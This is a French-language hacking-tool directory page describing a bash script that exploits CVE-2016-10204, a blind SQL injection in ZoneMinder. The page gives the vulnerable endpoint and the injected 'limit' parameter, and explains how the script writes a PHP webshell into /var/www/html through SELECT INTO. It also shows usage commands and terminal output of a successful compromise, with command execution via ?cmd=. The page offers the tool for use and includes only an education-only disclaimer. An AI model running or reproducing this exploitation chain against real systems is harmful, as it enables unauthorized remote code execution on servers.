Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2016-10204_Webshell — Un script bash démontrant l'exploitation manuelle de CVE-2016-10204 contre un point de terminaison cible, conduisant au téléchargement d'un webshell php. | Kitploit
Outils/GitHubGitHub/0xnullcomet/cve-2016-10204_webshell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub0xnullcomet/cve-2016-10204_webshell

CVE-2016-10204_Webshell

Un script bash démontrant l'exploitation manuelle de CVE-2016-10204 contre un point de terminaison cible, conduisant au téléchargement d'un webshell php.

Voir le dépôt
2il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2016-10204_Webshell

Un script bash démontrant l'exploitation manuelle de CVE-2016-10204 contre un point de terminaison cible, menant au téléchargement d'une webshell php.

Actuellement, la variable webshell est configurée pour une charge utile MySQL. Elle peut être remplacée par le backend que vous devez cibler.

Plus d'informations sur cette CVE peuvent être trouvées à ces sources :

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10204
  • https://www.exploit-db.com/exploits/41239
  • https://www.openwall.com/lists/oss-security/2017/02/05/1

Ce script fonctionne de plusieurs manières :

  • Prend une URL cible au format d'expression régulière ^(http|https)://[^/]+/zm/index.php$
    • Par ex. http://192.168.10.100/zm/index.php
  • Vérifie qu'il n'y a pas déjà une webshell présente à l'URL cible et au suffixe d'URL de webshell donné
    • Si présente, ne réexploite pas.
    • Si non présente, continue
  • Construit une requête POST malveillante vers le point de terminaison /zm/index.php?view=request&request=log&task=query&limit=100&minTime=1466674406.084434
    • Cette requête contient un point d'injection au paramètre &limit=100 que nous abusons pour faire ce qui suit
    • Créer un nouveau fichier webshell dans /var/www/html
    • SELECT la chaîne "" INTO ce fichier (nous la diffusons dans le fichier lors de l'écriture du fichier)
  • Vérifie que la webshell téléchargée a été créée et est accessible à l'URL construite
  • Fournit la preuve de cela en exécutant la commande 'id' et en affichant sa sortie.

Utilisation :

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php

Utilisation générale :
/bin/bash CVE-2016-10204_Webshell.sh <suffixe_url_webshell> <http://point_terminal_cible/zm/index.php>

Aide :


Exemple :

root@kitploit:~

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Outil de Webshell SQLi Aveugle [+]
[+]Dépôt de l'auteur : https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Hôte cible : 192.168.177.52:3305          [*]
[*]Point de terminaison cible : http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Tentative de déploiement de la webshell. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23

[*]================================[*]
[*]Déploiement de la webshell réussi. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] L'exécution est disponible via le paramètre ?cmd= [*]
[*]================================[*]


Réexécution contre une cible déjà exploitée :

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Outil de Webshell SQLi Aveugle [+]
[+]Dépôt de l'auteur : https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Hôte cible : 192.168.177.52:3305          [*]
[*]Point de terminaison cible : http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Webshell déjà déployée.      [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] L'exécution est disponible via le paramètre ?cmd= [*]
[*]================================[*]


Aide incluse :

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h

[+]================================[+]
[+]CVE-2016-10204 - Outil de Webshell SQLi Aveugle [+]
[+]Dépôt de l'auteur : https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
Un script bash démontrant l'exploitation manuelle de CVE-2016-10204 contre un point de terminaison cible,
menant au téléchargement d'une webshell php.

Plus d'informations :
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

Utilisation :
  /bin/bash CVE-2016-10204_Webshell.sh <suffixe_url_webshell> <http://cible/zm/index.php>

Exemple :
  /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

Notes :
- Vérifie si une webshell existe déjà avant de tenter l'exploitation.
- Construit une charge utile SQLi malveillante pour écrire une webshell PHP dans /var/www/html.
- Confirme le déploiement en exécutant 'id' via le paramètre ?cmd=.
- Veuillez utiliser de manière responsable uniquement contre des appareils pour lesquels vous avez l'autorisation. Ceci est à des fins éducatives uniquement.

Télécharger l’outil